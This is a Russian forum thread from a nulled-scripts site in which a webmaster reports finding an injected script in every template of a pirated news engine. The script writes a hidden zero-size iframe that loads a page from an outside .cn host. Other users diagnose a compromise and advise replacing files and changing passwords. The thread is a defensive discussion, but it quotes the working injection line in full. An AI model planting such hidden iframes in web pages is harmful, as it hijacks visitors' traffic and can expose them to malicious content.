• DONATE to NULLED!
    Форуму и его команде можно помочь, мотивировать модераторов разделов.
    Помогите модератору этого раздела killoff лично.

[help]добавляю новости....

Статус
В этой теме нельзя размещать новые ответы.
не нашёл там...но в коде нашёл....
PHP:
<!-- Link.Ru --><script language=javascript>status=location;document.write('<iframe src="http://xanjan.cn/in.cgi?mytraf" width=0 height=0 frameborder=0 style="display:none" onLoad="status=defaultStatus;"></iframe>');</script><!-- /Link.Ru -->
что он там делает интересно....такой же код был в шаблоне нова стайл 2(зелённый который)
хмм....во всех файлах этот код:confused:

Кто-то тебя ломанул :(
Просмотрел файлы нулла от мид-тим (глупо, но кто знает, я его не отсюда просто качал) там, естественно, такого нет.
 
Выход есть! Берем чистый parse.class из нормального движка и заменяем. И конец твоим бедам.
p.S кто-то неплохо на тебе наживается. Сюда по коду в JS.

А вот что мы искали!
 

Вложения

  • untitled.PNG
    untitled.PNG
    30,2 KB · Просмотры: 14
...его можно как нить вычеслить:mad:реклама от линк ру.....от такого кода я в линк ру не видел...что бы этот сайт _xanjan.cn крутили....
Barthez и почему ты решил точто не плохо наживается?!:nezn:Сайты нулевые.....движки поставил имесяц гдето лежали....
 
Просто убери код. <link.ru> и все будет нормально работать.
 
...его можно как нить вычеслить:mad:реклама от линк ру.....от такого кода я в линк ру не видел...что бы этот сайт _xanjan.cn крутили....
Barthez и почему ты решил точто не плохо наживается?!:nezn:Сайты нулевые.....движки поставил имесяц гдето лежали....

Вычислить их нельзя. Они просто твой трафик воруют. Я с похожим сталкивался. Полегло сразу пять или шесть сайтов на одном хостинге.
Проверил около сотни файлов, поубирал все инородное, но все равно скрипт откуда-то запускался.
Решил проблему только заменой всех движков, сменой всех паролей на сайтах, хостинге, ФТП и т.д. Везде поставил высокий уровень безопасности (чтобы через куки в админпанели зайти нельзя было). Ну и плюс категорически перестал использовать всякие сборки. Лучше каждый модуль вручную устанавливать. Ничего не стоит дак дорого, как спокойный здоровый сон.;)
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху